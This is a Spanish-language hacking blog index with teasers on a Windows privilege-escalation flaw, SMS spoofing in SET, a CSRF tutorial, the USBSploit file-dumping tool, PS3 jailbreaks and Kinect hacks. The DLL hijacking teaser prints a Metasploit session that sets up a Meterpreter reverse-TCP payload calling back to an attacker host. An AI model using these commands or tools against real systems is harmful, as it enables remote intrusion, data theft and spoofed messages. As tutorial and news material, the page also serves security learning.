PoC: Escalada de privilegios en Windows vista/7/2008

Hace poco se publico una    0-day que afectaba la mayoria de las plataformas (7/vista/2008) , dicho fallo podria ser explotada por atacantes locales para lograr el control completo de un sistema vulnerable. Este “problema” es causado por un error de validación en el servicio de administración de tareas el cual falla al prevenir que los usuarios manipulen ciertos campos en el esquema del archivo XML por medio de la interface COM, lo cual podría permitir a un usuario malicioso manipular los archivos XML validos y “saltarse” el chequeo de integridad CRC32 y ejecutar código de manera arbitraria con privilegios Administrativos

Leer más

Uso de SMS Spoofing desde SET

provechando la publicación de los vídeos de la NcN, para aquellos que estén interesados, comentamos que durante la charla se realizó una demostración del uso de la funcionalidad de “SMS Spoofing” que se ha añadido a la versión 1.0 de Social Engineering Toolkit (SET). Por cierto, aprovechamos tambén para agradecer a Dave Keneddy la “acogida” de la aportación al framework de SET. Ha sido un auténtico placer poder colaborar con este proyecto.

En este post nos gustaría acabar de repasar las diferentes opciones disponibles des de la funcionalidad de “SMS Spoofing”.

 

Leer más

Tutorial Vulnerabilidad CSRF

Inicio Tutorial Cross Site Request Forgery By ShadinessDark = Zero Bits

1.) Presentación

2.) Que es CSRF

3.) Quien descubrió la vulnerabilidad CSRF

4.) CSRF y Xss

5) Robo de Cookies en XSS & CSRF (Diferencia) – Colaboracion de Zero Bits

6.) Testeando vulnerabilidad CSRF y programas el code vulnerable

7.) Sacando una conclusión a todo

8.) Como cuidar nuestra Web de este tipo de ataques

9.) Despedida

1.) Presentación

Primero que nada este tutorial va dedicado a mis amigos de BugDox y a todo los Lectores especialmente a los que no les caigo bien, muchos me harán criticas Y eso es Bueno porque Uds. Me corrigen como muchos saben yo me retire del DEFACING no Es que yo sea conocido ni nada por el estilo este tutorial lo he hecho de manera especial

Para dar la diferencia de otros tutoriales que he visto en la red…

¿Por qué diferente?

Porque la mayoría de los tutoriales visto en la red son poco explicados para iniciados

¿A que se debe este tutorial?

Bueno este tutorial no puedo decir que lo hago con el fin de bien lo hago para bien y Para mal lo hago con concepto de cómo explotarlo y concepto de cómo arreglarlo

No es mi culpa que un Web Master no me haga caso ¿Verdad?

Los saludos más especiales para mis compañeros:

Zero Bits

KuTer

Jeferx

Darki113r

_84kur10_

Z1z30f

Kozmic.Kizz

Leer más

Kinect como cámara 3D

Los pequeños hacks que están apareciendo para el dispositivo de Microsoft están permitiendo lograr cosas muy interesantes, como convertir a Kinect en un dispositivo capaz de generar vídeo en 3D en tiempo real. Un usuario lo ha demostrado con un código que ya había utilizado en otros proyectos de realidad virtual en su proyecto de investigación, y combinando su solución con el código que el joven español Hector Martín lanzó hace pocos días, ha logrado una aplicación espectacular.

 

El código desarrollado por Martín nada más aparecer Kinect en nuestro país permitió poder acceder a algunas de las posibilidades del dispositivo de Microsoft pero no desde la consola Xbox 360 para la que está dirigido, sino conectándolo a PCs y portátiles a través del puerto USB.

 

Leer más

USBSploit

USBsploit es una herramienta que está todavía en versión beta y ha sido creado por un investigador de Infosec y propietario de la Secubsimage popular portal.

Esta herramienta hace que sea sencillo para cualquier persona que desea volcar archivos desde dispositivos USB a distancia en múltiples objetivos al mismo tiempo.Funciona a través de sesiones Meterpreter con una luz (24 MB) una versión modificada deMetasploit. La interfaz es una versión modificada del JUEGO.

 

Leer más

Hackean la PlayStation 3 utilizando una calculadora

Navegando por la red de redes me he topado con una noticia curiosa: Han realizado unjailbreak a la PS3 desde una calculadora TI84. Aunque han utilizado el PSGroove,  el dispositivo utilizado no deja de ser curioso, ya que hasta ahora se ha hackeado la PS3 desde un pendrive o incluso utilizando teléfonos móviles.

La calculadora se conecta con un cable USB A a mini cable USB-B (incluido con  la calculadora) y  se utiliza para cargar los controladores de PS3. Aunque es mejor que veáis un vídeo demostrativo:

[youtube=http://www.youtube.com/watch?v=vOSpCoCmOns]

Visto en: http://www.softzone.es/2010/09/12/hackean-la-playstation-3-utilizando-una-calculadora/

Palm Pre y Nokia N900, nuevos dispositivos capaces de Hackear el PS3

Son muchas las noticias que les hemos llevado sobre el Jailbreak en el PS3 y, aunque hace poco leíamos sobre las palabras de Germán que posiblemente era el final de éste movimiento, muchos -en nuestro interior- sabíamos que apenas era el comienzo. Es que cuando se trata de piratear o alterar el software de algún dispositivo reconocido como el iPhone o, en este caso la PS3, es inevitable que los avances dejen de salir.

Leer más

DLL Hijacking con Metasploit

Aunque no es algo nuevo, últimamente se habla mucho sobre DLL Hijacking o suplantación de librerías DLL, gracias al reciente fallo de los  sistemas Microsoft Windows que permite ejecutar código malicioso, colocando la dll a suplantar en la misma carpeta del programa ejecutable, descubierto hace poco por HD Moore y explicado a fondo en su articuloExploiting DLL Hijacking Flaws, también ha publicado un kit, para buscar aplicaciones que puedan ser vulnerables a este tipo de ataque DLLHijaAuditKit.

 

Abrimos metasplit

rokitoh@red-orbita# msfconsole
msf > use exploit/windows/browser/webdav_dll_hijacker
msf exploit(webdav_dll_hijacker) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(webdav_dll_hijacker) > set EXTENSIONS «grp p7c vcf wab»
EXTENSIONS => grp p7c vcf wab
msf exploit(webdav_dll_hijacker) > set lhost 192.168.1.111
lhost => 192.168.1.111
msf exploit(webdav_dll_hijacker) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.111:4444
[*]
[*] Exploit links are now available at \192.168.1.111documents
[*]
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.1.111:80/

 

 

Leer más